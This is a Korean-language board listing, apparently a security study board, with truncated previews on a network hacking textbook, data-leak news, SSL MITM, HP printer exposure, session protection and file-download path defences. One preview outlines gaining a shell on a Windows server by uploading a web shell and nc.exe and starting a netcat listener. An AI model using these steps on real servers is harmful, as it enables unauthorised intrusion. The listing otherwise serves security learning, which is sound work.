| IT CookBook, 정보 보안 개론과 실습: 네트워크 해킹과 보안(개정판)
|
| ...eroute를 이용한 IP 주소 추적 | 풋프린팅과 스캐닝 | 윈도우 시스템과 리눅스·유닉스 시스템의 목록화
네트워크 해킹(8~13장): 스니핑 공격 방법과 대응책 | ARP·IP·DNS 스푸핑과 보안 대책 | 터널링과 은닉 채널 | 세션 하이재킹 공격과 보안 대책| 무선 네트워크 보... |
| |
공개
| 댓글: 1 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 기업·기관 등에서 가장 우려하는 보안 위협은?
|
| ‘개인정보 유출’이 가장 우려하는 보안 위협 1위
[보안뉴스 김경애] 최근 기업과 기관 등의 개인정보유출 사고가 빈번히 발생하면서 각 기업과 기관 등의 고민은 갈수록 커지고 있다. 이에 따라 개인정보보호에 대한 관심 역시 갈수록 높아지고 있는 실정이다. 그렇다면 기업과 기관 등에... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 이 웹사이트의 주소가 확인되지 않았습니다.
|
| https 사이트를 크롬으로 접속할 때 일부 사이트에서는 제목과 같은 오류가 뜨면서 가능하면 접속하지 말라고 한다.
내가 접속하는 메일서버도 보안인증서에 오류가 있어서 이런 메시지가 뜬다.
SSL MITM이라는 해킹 방식을 이용하면 보안 웹접속도 가로채기가 가능하다고 한다.
... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| HP 프린터 보안 문제
|
| 웹을 통해 프린터만 들어가도 그 곳의 많은 정보를 알 수 있는 것 같습니다.
심지어는 관리자 설정을 통해 프린터 사용을 막을 수도 있군요.
또 대량의 문서를 업로드해서 인쇄시킴으로써 프린터를 dos할 수도 있을 것 같습니다.
주위의 프린터에 웹접근이 가능한 것이 있으면 설정을 바꿔... |
| |
공개
| 댓글: 2 | 첨부파일: 2 |
등록자: jinsuk |
등록일:
|
| |
| 사용자 로그인에 대한 IP 보안
|
| 크로스사이트스크립트 취약점 등을 이용하여 세션을 탈취당한 경우에는 내 계정을 해커가 공유할 수 있게 됩니다.
그래서 다양한 세션보호 방법들이 강구되는 데 그중에서 가장 이해하기 쉽고 간단하게 해결할 수 있는 방안이 세션에 로그인한 IP주소를 기록해두는 것입니다.
위키피디아에서는 다음... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| 모바일 악성코드, 1년새 614% 급증
|
| ...6배 이상 급증한 것으로 나타났다. 특히 사이버범죄자들이 모바일 악성코드를 주요 돈벌이 수단으로 악용하고 있어 그에 대한 대책 마련이 시급한 상황이다.
주니퍼네트웍스가 3차 연례 ‘모바일 보안 위협 보고서(Mobile Threats Report)’를 발표했는데 이 보고서에 따르면 ... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| | 파일다운로드 취약점 보안 대책 - 절대경로(full path)
|
| 1. 서버의 다운로드 스크립트내에서 다운로드 가능한 디렉토리 목록을 설정한다.
2. 다운로드를 허용하기 전에 대상 파일의 절대경로(파일시스템 상의)를 생성한다.
3. 대상 파일이 허용 디렉토리 내부 파일이 아니면 거부한다.
JSP의 경우 절대경로는 getServletCo... |
| |
공개
| 댓글: 2 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | 윈도우 서버 쉘 따기: reverse telnet
|
| 1. 파일업로드 기능이 있는 웹쉘 업로드 (예를 들어 cmd.asp)
2. nc.exe 업로드
3. cmd.asp를 통해 nc.exe 경로확인 (dir /w /s \nc.exe)
- C:\InetPub\wwwroot\board\pds\nc.exe
4. 공격자: nc.exe -l ... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
|
